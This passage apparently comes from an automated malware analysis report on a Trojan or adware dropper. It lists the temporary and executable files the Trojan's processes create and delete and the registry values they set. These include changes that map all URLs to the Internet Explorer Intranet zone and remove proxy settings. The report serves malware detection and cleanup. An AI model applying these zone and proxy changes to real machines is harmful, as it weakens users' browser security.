%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (76650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (208 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].finish,9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].2008&update4=nation,us&update5=language,en (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (0 bytes)

The process CashReminder.exe:1232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
%WinDir%\Temp\P_RuleList.txt (265 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
%WinDir%\Temp\P_StoreList.txt (687 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_StoreList.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process GOSafer.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
%WinDir%\Temp\G_RuleList.txt (16 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\G_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\G_RuleList.txt (0 bytes)

The process WNet.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
%WinDir%\Temp\P_RuleList.txt (94 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process 310714_is.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)

Registry activity

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0B 73 68 19 D4 B8 20 54 0C 39 E9 0E 94 8F 7F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayName" = "ActSys"
"QuietUninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"Publisher" = "NINJASOFT LLC"

[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: wTPAs0BV5vwXnsqTRKHr9acfe)"
"DisplayVersion" = "1.2.0"

The process net1.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 FC 87 E8 80 A2 55 7D AA 1A 8C 10 15 12 EE C2"

The process net1.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 74 19 E5 13 50 24 54 9A 40 6B 6D DC A1 84 7D"

The process net1.exe:2220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 2E BE 5A C2 09 9D 92 F4 C5 CA 9C B2 8E DB 30"

The process net1.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 8C FF 26 57 BD 1B F4 D2 AB BE 49 AB 1F 7F C8"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 42 7D A0 57 47 2B B7 FE 76 DE E4 3A 31 67 CE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 310714_is.tmp:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 6A 3E 23 7C F3 73 72 CF 72 AC 59 12 BB 7F 79"

The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B CC C6 55 8D 18 2D B0 27 A2 5D EC 73 67 A1 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ProtectService.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 96 CC 61 6D 7A 19 DE 6D 6B E8 FC 68 F4 93 2A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process ProtectService.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 23 63 9C A3 6A 5E 1F 4E 66 23 2C 78 39 B7 EC"

The process ProtectService.exe:3468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 29 46 DA F9 47 D1 BE D9 26 DF 69 E6 7D 1A 96"

